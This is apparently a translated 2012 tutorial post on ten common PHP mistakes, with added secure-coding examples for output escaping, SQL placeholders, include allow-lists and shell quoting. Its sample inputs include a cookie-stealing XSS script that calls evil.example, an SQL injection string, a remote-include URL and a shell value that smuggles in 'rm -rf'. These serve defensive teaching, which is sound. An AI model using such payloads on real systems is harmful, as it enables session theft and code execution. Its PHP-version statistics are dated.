10 mistakes PHP programmers are most likely to make

original
2012/07/13 08:20

PHP is a great and flexible web development language, but I see the same mistakes made by PHP programmers over and over again. The following list contains 10 mistakes PHP programmers make often, most of which relate to security. See how many of them you have committed yourself.

1. Not escaping HTML entities

A basic rule: all untrusted input (especially data users submit through forms) must be escaped before it is output.

echo $_GET['username'];

This example outputs whatever the user placed in the parameter, including any markup or script tags. That is an obvious security risk (cross-site scripting) unless you can guarantee that every user submits well-formed input, which you cannot.

How to fix:

We need to convert "<", ">", "&" and quotation marks into their HTML entity representations (&lt;, &gt;, &amp;, &quot; and &#039;). The functions htmlspecialchars() and htmlentities() do exactly that.

Correct method:

// pass the charset explicitly: before PHP 5.4 the default was ISO-8859-1, not UTF-8
echo htmlspecialchars($_GET['username'], ENT_QUOTES, 'UTF-8');
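The following is an added example, not code from the original post. It puts the vulnerable and the escaped form of the echo above side by side with a constructed hostile parameter, and shows one context (a URL attribute) that htmlspecialchars() alone does not cover. The helper names e() and safe_url() and the parameter names are assumptions made for the example.

```php
<?php
// Added example, not from the original post. Constructed attacker input, as it
// would arrive in ?username=...
$_GET['username'] = '<script>document.location="http://evil.example/?c="+document.cookie</script>';

// One escaping helper for every value that lands inside HTML text or a quoted
// attribute. ENT_QUOTES covers both ' and "; the explicit charset avoids
// mis-escaping on PHP < 5.4, where the default was ISO-8859-1.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

// Vulnerable: the script tag is emitted verbatim and runs in the victim's browser.
$unsafe = 'Hello, ' . $_GET['username'];

// Safe in text and in a double-quoted attribute: < > & " ' become entities.
$safe_text = 'Hello, ' . e($_GET['username']);
$safe_attr = '<input type="text" name="username" value="' . e($_GET['username']) . '">';

// Not covered by entity escaping: a URL attribute. This value contains no HTML
// metacharacters, so e() leaves it untouched, yet clicking the link runs
// script. The scheme has to be validated separately (assumed helper).
$_GET['homepage'] = 'javascript:alert(document.cookie)';
function safe_url(string $url): string
{
    $scheme = parse_url($url, PHP_URL_SCHEME);
    return in_array($scheme, ['http', 'https'], true) ? $url : '#';
}
$safe_link = '<a href="' . e(safe_url($_GET['homepage'])) . '">home</a>';

echo $unsafe, "\n", $safe_text, "\n", $safe_attr, "\n", $safe_link, "\n";
```

Escape at the point of output, once per destination: the same value needs entity escaping when it lands in HTML and scheme validation when it lands in an href, and neither replaces the other.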

2. Not escaping SQL input

I once discussed this problem in an article on the simplest way to prevent SQL injection (PHP + MySQL) and gave a simple method. Someone told me that they have set magic_quotes to On in php.ini, so they do not need to worry about it, but not all input comes from $_GET, $_POST or $_COOKIE!

How to fix:

Use mysql_real_escape_string(), as in the article on the simplest way to prevent SQL injection (PHP + MySQL). Note that it needs an open database connection, that it only protects values placed inside quotes, and that the whole mysql extension was deprecated in PHP 5.5 and removed in PHP 7; on current PHP the answer is a prepared statement (PDO or mysqli).

Correct practice:

<?php
$sql = "UPDATE users SET
        name='" . mysql_real_escape_string($name) . "'
        WHERE id='" . mysql_real_escape_string($id) . "'";
mysql_query($sql);
?>
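The following is an added example, not code from the original post. It runs the same UPDATE through a prepared statement and contrasts it with string concatenation, using a constructed hostile value for the id. To run offline it uses an in-memory SQLite database via PDO (this assumes the pdo_sqlite extension is available); the table, rows and input are constructed for the demonstration.

```php
<?php
// Added example, not from the original post. Requires PDO with pdo_sqlite.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL)');

// Constructed sample rows, reset before each variant runs.
function seed(PDO $db): void
{
    $db->exec('DELETE FROM users');
    $db->exec("INSERT INTO users (id, name) VALUES (1, 'alice'), (2, 'bob'), (3, 'carol')");
}

// What an attacker types into the "id" form field.
$id   = "1' OR '1'='1";
$name = 'pwned';

// Vulnerable: the quote in $id closes the literal, the OR clause is true for
// every row, and every user is renamed.
seed($db);
$concatenated = "UPDATE users SET name='$name' WHERE id='$id'";
$rows = $db->exec($concatenated);
echo "concatenated query renamed $rows user(s)\n";

// Safe: the statement is compiled with placeholders before any value is seen,
// so $id can only ever be compared as data. No user has that id, no row changes.
seed($db);
$stmt = $db->prepare('UPDATE users SET name = :name WHERE id = :id');
$stmt->execute([':name' => $name, ':id' => $id]);
echo "prepared statement renamed " . $stmt->rowCount() . " user(s)\n";

// Escaping only helps inside quotes. An unquoted numeric comparison such as
// WHERE id=$id stays injectable even after mysql_real_escape_string(), so
// validate the type as well before the value gets anywhere near a query.
$safeId = filter_var($id, FILTER_VALIDATE_INT);
echo $safeId === false ? "id rejected by validation\n" : "id accepted\n";
```

With placeholders the query text is fixed at prepare time, so there is nothing for a stray quote to close; the type check is the second layer for columns that are never quoted in the first place.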

3. Misusing the HTTP header functions: header(), session_start(), setcookie()

Have you ever seen this warning? "Warning: Cannot modify header information - headers already sent by (output started at ...)"

Every time the server delivers a page, its output consists of two parts: the headers and the body.

The headers carry data the user does not see, such as cookies, and they always arrive first. The body carries the visible HTML, images and other data.

If output_buffering is Off, every function that touches the HTTP headers must be called before any output is produced. The trouble is that output_buffering may be set differently in the environment you develop in and the one you deploy to. Code that worked in development then stops redirecting, and cookies and sessions are no longer set correctly.

How to fix:

Call every header-related function before producing any output (a stray newline or a UTF-8 byte-order mark before the opening <?php tag counts as output), and develop with output_buffering=Off so that a misplaced call fails on your machine instead of on the production server.
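The following is an added example, not code from the original post. It applies the ordering rule and adds a check a practitioner wants: when the redirect cannot be sent because output already started, the script stops instead of rendering the protected page for an unauthenticated visitor. The helper name, cookie name and paths are assumptions made for the example.

```php
<?php
// Added example, not from the original post. Assumed names: redirect_or_die,
// the 'lang' cookie and /login.php.
function redirect_or_die(string $url): void
{
    if (headers_sent($file, $line)) {
        // Output has already started (typically whitespace or a BOM before the
        // opening tag of some included file), so no Location header can be
        // sent. Fail closed: log where the stray output came from and stop,
        // rather than letting the rest of the page render.
        error_log("redirect to $url failed: output started at $file:$line");
        exit('Redirect failed');
    }
    header('Location: ' . $url, true, 303);
    exit;   // never keep executing after a redirect header
}

// Everything that touches HTTP headers comes first: session, cookies, redirects.
session_start();
// options-array form of setcookie() requires PHP >= 7.3
setcookie('lang', 'en', ['path' => '/', 'httponly' => true, 'samesite' => 'Lax']);

if (empty($_SESSION['user'])) {
    redirect_or_die('/login.php');
}

// Only now does the body start.
echo '<!DOCTYPE html><html><body>Welcome, ',
     htmlspecialchars($_SESSION['user'], ENT_QUOTES, 'UTF-8'),
     '</body></html>';
```

headers_sent() with its two by-reference arguments tells you exactly which file and line started the output, which is usually all you need to find the offending byte.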

4. Passing unsafe data to require or include

Again: do not trust data you did not explicitly write yourself. Never include or require a file whose name comes from $_GET, $_POST or $_COOKIE.

For example:

index.php:

<?php
// including header, config, database connection, etc.
include($_GET['filename']);
// including footer
?>

Now anyone can request http://www.yourdomain.com/index.php?filename=anyfile.txt

to read any file the web server can read (configuration files with database passwords, for instance), or to execute any PHP script on the server.

If remote includes are enabled (allow_url_fopen=On on PHP before 5.2; on 5.2 and later the separate setting allow_url_include, which is Off by default), it is over:

Try this input:

http://www.yourdomain.com/index.php?filename=http%3A%2F%2Fdomain.com%2Fphphack.php

Your page now runs whatever the attacker put in http://www.youaredoomed.com/phphack.php, with the privileges of your web server. The attacker can send spam, change passwords, delete files, anything you can imagine.

How to fix:

You must control which files an include or require directive can load.

The following is a quick but not comprehensive solution:

 

<?php
// Include only files that are explicitly allowed.
$allowedFiles = array('file1.txt', 'file2.txt', 'file3.txt');

if (in_array((string)$_GET['filename'], $allowedFiles)) {
    include($_GET['filename']);
} else {
    exit('not allowed');
}
?>
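The following is an added example, not code from the original post. It extends the allow-list above in the way a practitioner would: the request names a page key rather than a file name, the key is mapped to a path, and the resolved path is checked to lie inside one directory, so a value such as ../../etc/passwd or an http:// URL never reaches include at all. The directory, page names and helper name are assumptions.

```php
<?php
// Added example, not from the original post. Assumed layout: a pages/
// directory next to this script containing home.php, about.php, contact.php.
$pagesDir = __DIR__ . '/pages';
$pages = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page(string $key, array $pages, string $dir): ?string
{
    // The user can only pick a key; an unknown key maps to no file at all,
    // so traversal sequences and URLs are rejected before any path exists.
    if (!isset($pages[$key])) {
        return null;
    }
    $base = realpath($dir);
    $file = realpath($dir . '/' . $pages[$key]);
    // Defence in depth: even if the map is later edited to hold a bad entry,
    // the resolved path must still be a regular file below $pagesDir.
    if ($base === false || $file === false || !is_file($file)
        || strpos($file, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $file;
}

$key  = isset($_GET['page']) ? (string) $_GET['page'] : 'home';
$file = resolve_page($key, $pages, $pagesDir);
if ($file === null) {
    http_response_code(404);
    exit('not found');
}
include $file;
```

The difference from the quick fix is that the attacker never supplies a path, only a lookup key, and realpath() resolves symlinks and ../ components before the containment check runs.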

5. Syntax errors

Syntax errors cover all lexical and grammatical mistakes, and they are so common that I have to list them here. The cure is to learn PHP's syntax carefully and take care not to drop a bracket, brace, semicolon or quotation mark. Use a good editor as well, not Notepad!

6. Little or no use of object orientation

Many projects make no use of PHP's object-oriented features, and as a result maintaining the code becomes very time-consuming and laborious. PHP's support for object-oriented programming keeps growing and keeps getting better. There is no reason not to use it.

7. No framework

95% of PHP projects do the same four things: create, edit, list and delete. There are many MVC frameworks that help with exactly these four things. Why not use them?

8. Not knowing the functions PHP already has

PHP's core ships with a great many functions, yet many programmers keep reinventing the wheel and waste a lot of time doing it. Search the PHP manual and Google before you code; you may find something new. exec(), for instance, is a powerful function: it runs a shell command and returns the last line of its output as a string. If any part of that command comes from user input, quote each such value with escapeshellarg(); escapeshellcmd() escapes the metacharacters of a whole command line but still lets an attacker add extra arguments.
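The following is an added example, not code from the original post. It shows what escapeshellcmd() and escapeshellarg() each do to a constructed hostile value, and then the pattern for calling exec() on user-influenced input: fixed command, each value quoted as a single argument, the file validated before any command runs, exit status checked. It assumes a POSIX shell with wc(1) available; the helper name is an assumption.

```php
<?php
// Added example, not from the original post. Constructed attacker input.
$hostile = 'report.txt; rm -rf /tmp/x';

// escapeshellcmd() targets a whole command line: it backslash-escapes shell
// metacharacters such as ; | & but leaves spaces alone, so the shell still
// splits the value into several arguments. A program that accepts options can
// then be driven with injected flags.
echo 'escapeshellcmd: ', escapeshellcmd($hostile), "\n";

// escapeshellarg() wraps the value in single quotes and escapes embedded
// single quotes, so the shell hands it over as exactly one argument.
echo 'escapeshellarg: ', escapeshellarg($hostile), "\n";

// Assumed helper: byte count of a file under the temp directory, via wc.
function file_byte_count(string $path): ?int
{
    // Only an existing regular file below the allowed directory is accepted;
    // realpath() resolves ../ and symlinks before the containment check.
    $base = realpath(sys_get_temp_dir());
    $real = realpath($path);
    if ($base === false || $real === false || !is_file($real)
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    // The command is fixed; the one user-influenced value is a single argument.
    exec('wc -c < ' . escapeshellarg($real), $output, $status);
    if ($status !== 0 || !isset($output[0])) {
        return null;
    }
    return (int) trim($output[0]);
}

$sample = tempnam(sys_get_temp_dir(), 'demo');
file_put_contents($sample, 'hello world');
var_dump(file_byte_count($sample));    // size of the constructed sample file
var_dump(file_byte_count($hostile));   // null: rejected before any command runs
unlink($sample);
```

Where a PHP function can do the job (filesize() here), prefer it over a shell command; exec() should be the last resort, and when it is unavoidable the validation belongs before the call, not inside the shell.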

9. Using an old version of PHP

Many programmers are still using PHP 4. Developing on PHP 4 cannot make use of PHP's full potential, and it carries some security risks. Move to PHP 5; it does not take much effort, since most PHP 4 programs migrate with few or no changes to their statements. According to a survey by http://www.nexen.net, only 12% of PHP servers run PHP 5, so 88% of PHP developers are still on PHP 4.

10. Escaping quotation marks twice

Have you ever seen \' or \" appear on a web page? This usually happens because magic_quotes is Off in the developer's environment and On on the deployed server. With magic_quotes On, PHP runs addslashes() on all GET, POST and COOKIE data, and the code then runs addslashes() on it a second time.

Original text:

It's a string

With magic_quotes On:

It\'s a string

After addslashes() runs again:

It\\'s a string

HTML output:

It\'s a string

Another case: the user enters wrong login details, the server detects the error and outputs the same form again with the user's input filled in, and that input has now been escaped twice.
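The following is an added example, not code from the original post. It reproduces the double escaping described above for both servers and shows the rule that prevents it: bring input back to its raw form once, then escape exactly once for each destination. The helper names and the form field are assumptions; the input is constructed.

```php
<?php
// Added example, not from the original post.
$typed = "It's a string";   // constructed: what the user typed into the form

// What the script receives on each server. With magic_quotes_gpc=On
// (PHP < 5.4) the interpreter has already run addslashes() on every GPC value.
$received_dev  = $typed;               // developer's machine: magic_quotes_gpc=Off
$received_prod = addslashes($typed);   // deployment server:  magic_quotes_gpc=On

// The buggy code path from the post: it assumes unslashed input, slashes it
// itself for the query, and echoes the received value straight back into the
// form (which is also the HTML escaping mistake from section 1).
function buggy(string $received): array
{
    $forSql  = addslashes($received);
    $forForm = '<input name="title" value="' . $received . '">';
    return ['sql' => $forSql, 'form' => $forForm];
}

// The fix: one normalisation step that knows about the server, then exactly
// one escape per destination. In real code on PHP < 5.4 $magicQuotesOn would
// come from get_magic_quotes_gpc(); that function no longer exists in PHP 8.
function fixed(string $received, bool $magicQuotesOn): array
{
    $raw     = $magicQuotesOn ? stripslashes($received) : $received;
    $forSql  = addslashes($raw);   // better still: a prepared statement, see section 2
    $forForm = '<input name="title" value="'
             . htmlspecialchars($raw, ENT_QUOTES, 'UTF-8') . '">';
    return ['sql' => $forSql, 'form' => $forForm];
}

// On the developer's machine both variants look fine; on the deployment
// server only the fixed one keeps a single level of escaping everywhere.
$servers = ['dev' => [$received_dev, false], 'prod' => [$received_prod, true]];
foreach ($servers as $where => [$rx, $mq]) {
    printf("%-4s buggy: %s | %s\n", $where, buggy($rx)['sql'], buggy($rx)['form']);
    printf("%-4s fixed: %s | %s\n", $where, fixed($rx, $mq)['sql'], fixed($rx, $mq)['form']);
}
```

The point of the normalisation step is that the rest of the code never needs to know which php.ini it runs under: every escape is applied to the raw value, at the point of use, for the destination it is meant for.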
